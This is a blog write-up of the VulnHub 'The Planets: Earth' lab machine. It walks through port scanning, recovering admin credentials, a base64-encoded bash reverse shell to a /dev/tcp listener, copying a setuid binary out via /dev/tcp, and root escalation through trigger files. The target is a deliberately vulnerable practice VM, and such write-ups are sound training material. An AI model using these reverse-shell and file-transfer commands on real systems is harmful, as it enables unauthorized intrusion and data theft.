VulnHub: The Planets: Earth

Today we will take a look at Vulnhub: The Planets: Earth. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
nmap -p- -sV -sC -oN result/nmap/log.txt --open 192.168.0.105

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)

I added these on my /etc/hosts file.

192.168.0.105   earth.local  terratest.earth.local
  • Web

After checking the links with gobuster, I found the robots.txt extension.

https://terratest.earth.local/robots.txt

Disallow: /testingnotes.*

When I looked at the testnotes.txt extension, I found the username. In addition, how can I find the password

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

https://terratest.earth.local/testdata.txt

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

Now let’s decode with CyberChef.

We found the username and password. Let’s go to the admin panel.

Username: terra

Password: earthclimatechangebad4humans
  • Reverse shell

After giving the ‘ls’ command and checking, I saw that there was an executor of the command. Let’s get shell

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA3LzQyNDIgMD4mMQ== | base64 -d | bash'Don't forget to change.'└─$ nc -nvlp 4242             
listening on [any] 4242 ...
connect to [192.168.0.107] from (UNKNOWN) [192.168.0.105] 50364
bash: cannot set terminal process group (846): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$
  • Root

Command: find / -perm -u=s 2>/dev/null

There is such a thing here.

/usr/bin/reset_root

Let’s transfer it to our machine and look at its contents.

In local machine:

Command: nc -nlvp 9002 > reset_root

In target machine:

cat /usr/bin/reset_root > /dev/tcp/192.168.0.107/9002

So, we can use ltrace binary to trace the library calls of an ELF binary.

└─$ ltrace ./reset_root 
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", 0) = -1
access("/dev/shm/Zw7bV9U5", 0) = -1
access("/tmp/kcM0Wewe", 0) = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
+++ exited (status 0) +++

We should make that three files on the shown locations should be present to run the trigger

In target machine

touch /dev/shm/kHgTFI5G /dev/shm/Zw7bV9U5 /tmp/kcM0Wewe

/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$ su root
su root
Password: Earth

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Cryptography 101: Symmetric Encryption

ONIT SOLD OUT / 온잇 세일 종료

Is Your Development Team Slacking?

Digit Recognizer with Flutter and TensorFlow Lite

C++ Linking

How to build your first Python package?

Custom Forms Notifications

Polkacity Game Update: Unity Development, Day and Night Cycle Demo

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

HackThebox: Lame

TryHackMe: Linux Fundamentals III — Walkthrough

Everything you need to know about NGROK

HackTheBox-Timing